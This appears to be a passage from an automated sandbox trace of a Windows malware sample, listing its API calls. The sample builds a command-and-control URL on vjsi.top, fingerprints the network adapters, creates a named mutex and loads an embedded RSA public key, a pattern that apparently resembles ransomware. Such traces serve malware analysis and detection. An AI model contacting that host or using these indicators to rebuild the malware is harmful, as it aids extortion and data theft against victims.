IUnknown:Release (This=0x6b80d18) returned 0x0 [0111.960] CoUninitialize () [0111.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74a59c8 | out: hHeap=0x4970000) returned 1 [0111.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74a5740 | out: hHeap=0x4970000) returned 1 [0111.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74a5590 | out: hHeap=0x4970000) returned 1 [0111.961] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x49c63c8 [0111.962] OpenServiceW (hSCManager=0x49c63c8, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0111.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5730 [0111.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e3648 [0111.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e2fa8 [0111.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e3ae8 [0111.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e3d50 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e3fb8 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e4220 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74ff558 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74ff7c0 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74ffa28 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74ffc90 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74ffef8 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7500160 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75003c8 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7500630 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7500898 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7500b00 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0x7497900 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x110) returned 0x74e3210 [0111.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7497900 | out: hHeap=0x4970000) returned 1 [0111.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x110) returned 0x74beff8 [0111.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x74ea298, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0xb34) returned 0x5b0 [0112.201] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0112.201] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x28) returned 0x7505e28 [0112.201] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7500d68 [0112.201] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7500fd0 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7501238 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75014a0 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7501708 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7501970 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7501bd8 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7501e40 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75020a8 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7502310 [0112.202] lstrlenA (lpString="http://vjsi.top/nddddhsspen6/get.php") returned 36 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4a) returned 0x4a4f300 [0112.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7500d68, cbMultiByte=-1, lpWideCharStr=0x4a4f300, cchWideChar=37 | out: lpWideCharStr="http://vjsi.top/nddddhsspen6/get.php") returned 37 [0112.202] lstrcatW (in: lpString1="", lpString2="http://vjsi.top/nddddhsspen6/get.php" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.202] lstrlenA (lpString="") returned 0 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481d38 [0112.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7500fd0, cbMultiByte=-1, lpWideCharStr=0x7481d38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.202] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.202] lstrlenA (lpString="") returned 0 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481dc8 [0112.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7501238, cbMultiByte=-1, lpWideCharStr=0x7481dc8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.202] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.202] lstrlenA (lpString="") returned 0 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481d48 [0112.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x75014a0, cbMultiByte=-1, lpWideCharStr=0x7481d48, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.202] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.202] lstrlenA (lpString="") returned 0 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481d78 [0112.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7501708, cbMultiByte=-1, lpWideCharStr=0x7481d78, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.202] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.202] lstrlenA (lpString="") returned 0 [0112.202] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481d88 [0112.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7501970, cbMultiByte=-1, lpWideCharStr=0x7481d88, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.202] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.203] lstrlenA (lpString="") returned 0 [0112.203] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481de8 [0112.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7501bd8, cbMultiByte=-1, lpWideCharStr=0x7481de8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.203] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.203] lstrlenA (lpString="") returned 0 [0112.203] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481d98 [0112.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7501e40, cbMultiByte=-1, lpWideCharStr=0x7481d98, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.203] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.203] lstrlenA (lpString="") returned 0 [0112.203] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481da8 [0112.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x75020a8, cbMultiByte=-1, lpWideCharStr=0x7481da8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.203] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.203] lstrlenA (lpString="") returned 0 [0112.203] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2) returned 0x7481db8 [0112.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7502310, cbMultiByte=-1, lpWideCharStr=0x7481db8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.203] lstrcatW (in: lpString1="http://vjsi.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://vjsi.top/nddddhsspen6/get.php") returned="http://vjsi.top/nddddhsspen6/get.php" [0112.203] lstrlenW (lpString="") returned 0 [0112.203] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x12) returned 0x49ba200 [0112.203] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x288) returned 0x74e4488 [0112.203] GetAdaptersInfo (in: AdapterInfo=0x74e4488, SizePointer=0x18d82c | out: AdapterInfo=0x74e4488, SizePointer=0x18d82c) returned 0x0 [0112.299] GetAdaptersInfo (in: AdapterInfo=0x74e4488, SizePointer=0x18d82c | out: AdapterInfo=0x74e4488, SizePointer=0x18d82c) returned 0x0 [0112.304] GetLastError () returned 0x0 [0112.305] GetLastError () returned 0x0 [0112.305] CryptAcquireContextW (in: phProv=0x18d7fc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d7fc*=0x49d2808) returned 1 [0112.306] CryptCreateHash (in: hProv=0x49d2808, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d804 | out: phHash=0x18d804) returned 1 [0112.306] CryptHashData (hHash=0x74f7b60, pbData=0x750af60, dwDataLen=0x11, dwFlags=0x0) returned 1 [0112.307] CryptGetHashParam (in: hHash=0x74f7b60, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d800, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d800) returned 1 [0112.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdba8 [0112.307] CryptGetHashParam (in: hHash=0x74f7b60, dwParam=0x2, pbData=0x74cdba8, pdwDataLen=0x18d800, dwFlags=0x0 | out: pbData=0x74cdba8, pdwDataLen=0x18d800) returned 1 [0112.307] GetLastError () returned 0x0 [0112.307] CryptDestroyHash (hHash=0x74f7b60) returned 1 [0112.307] CryptReleaseContext (hProv=0x49d2808, dwFlags=0x0) returned 1 [0112.307] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750af60 | out: hHeap=0x4970000) returned 1 [0112.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3828 [0112.307] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c37f0 | out: hHeap=0x4970000) returned 1 [0112.307] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750aee8 | out: hHeap=0x4970000) returned 1 [0112.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0xafc) returned 0x5d0 [0112.611] WaitForSingleObject (hHandle=0x5d0, dwMilliseconds=0xffffffff) returned 0x0 [0113.263] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5cc [0113.263] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x28) returned 0x7505fa8 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7502578 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75027e0 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7502a48 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7502cb0 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7502f18 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7503180 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7506558 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75067c0 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7506a28 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7506c90 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x3e0) returned 0x7519c88 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x5ea) returned 0x74e4488 [0113.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x74e4488, cbMultiByte=1514, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 491 [0113.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x5f0) returned 0x74f21d8 [0113.264] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4488 | out: hHeap=0x4970000) returned 1 [0113.264] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7519c88 | out: hHeap=0x4970000) returned 1 [0113.264] CryptAcquireContextW (in: phProv=0x18d86c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d86c*=0x49d1c58) returned 1 [0113.266] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d870 | out: phHash=0x18d870) returned 1 [0113.266] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0113.266] CryptHashData (hHash=0x74f7ae0, pbData=0x74f21d8, dwDataLen=0x1ea, dwFlags=0x0) returned 1 [0113.266] CryptGetHashParam (in: hHash=0x74f7ae0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d874, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d874) returned 1 [0113.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdb68 [0113.266] CryptGetHashParam (in: hHash=0x74f7ae0, dwParam=0x2, pbData=0x74cdb68, pdwDataLen=0x18d874, dwFlags=0x0 | out: pbData=0x74cdb68, pdwDataLen=0x18d874) returned 1 [0113.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x34) returned 0x74f7ba0 [0113.266] GetLastError () returned 0x0 [0113.266] lstrcatA (in: lpString1="", lpString2="C3" | out: lpString1="C3") returned="C3" [0113.266] GetLastError () returned 0x0 [0113.266] lstrcatA (in: lpString1="C3", lpString2="84" | out: lpString1="C384") returned="C384" [0113.266] GetLastError () returned 0x0 [0113.266] lstrcatA (in: lpString1="C384", lpString2="37" | out: lpString1="C38437") returned="C38437" [0113.266] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C38437", lpString2="37" | out: lpString1="C3843737") returned="C3843737" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737", lpString2="F5" | out: lpString1="C3843737F5") returned="C3843737F5" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F5", lpString2="4B" | out: lpString1="C3843737F54B") returned="C3843737F54B" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54B", lpString2="AE" | out: lpString1="C3843737F54BAE") returned="C3843737F54BAE" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54BAE", lpString2="BF" | out: lpString1="C3843737F54BAEBF") returned="C3843737F54BAEBF" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54BAEBF", lpString2="38" | out: lpString1="C3843737F54BAEBF38") returned="C3843737F54BAEBF38" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54BAEBF38", lpString2="13" | out: lpString1="C3843737F54BAEBF3813") returned="C3843737F54BAEBF3813" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54BAEBF3813", lpString2="7D" | out: lpString1="C3843737F54BAEBF38137D") returned="C3843737F54BAEBF38137D" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54BAEBF38137D", lpString2="CB" | out: lpString1="C3843737F54BAEBF38137DCB") returned="C3843737F54BAEBF38137DCB" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54BAEBF38137DCB", lpString2="1B" | out: lpString1="C3843737F54BAEBF38137DCB1B") returned="C3843737F54BAEBF38137DCB1B" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54BAEBF38137DCB1B", lpString2="6F" | out: lpString1="C3843737F54BAEBF38137DCB1B6F") returned="C3843737F54BAEBF38137DCB1B6F" [0113.267] GetLastError () returned 0x0 [0113.267] lstrcatA (in: lpString1="C3843737F54BAEBF38137DCB1B6F", lpString2="0B" | out: lpString1="C3843737F54BAEBF38137DCB1B6F0B") returned="C3843737F54BAEBF38137DCB1B6F0B" [0113.268] GetLastError () returned 0x0 [0113.268] lstrcatA (in: lpString1="C3843737F54BAEBF38137DCB1B6F0B", lpString2="1C" | out: lpString1="C3843737F54BAEBF38137DCB1B6F0B1C") returned="C3843737F54BAEBF38137DCB1B6F0B1C" [0113.268] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb68 | out: hHeap=0x4970000) returned 1 [0113.268] CryptDestroyHash (hHash=0x74f7ae0) returned 1 [0113.268] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0113.268] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0113.268] lstrlenA (lpString="C3843737F54BAEBF38137DCB1B6F0B1C") returned 32 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x3e0) returned 0x7519c88 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x5ea) returned 0x74e4488 [0113.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x74e4488, cbMultiByte=1514, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 491 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x5f0) returned 0x74f21d8 [0113.268] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4488 | out: hHeap=0x4970000) returned 1 [0113.268] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7519c88 | out: hHeap=0x4970000) returned 1 [0113.268] lstrcpyA (in: lpString1=0x74ea2b8, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0113.268] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0x4a5f8f8 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x28) returned 0x7506038 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7506ef8 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7507160 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75073c8 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7507630 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7507898 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7507b00 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7507d68 [0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7507fd0 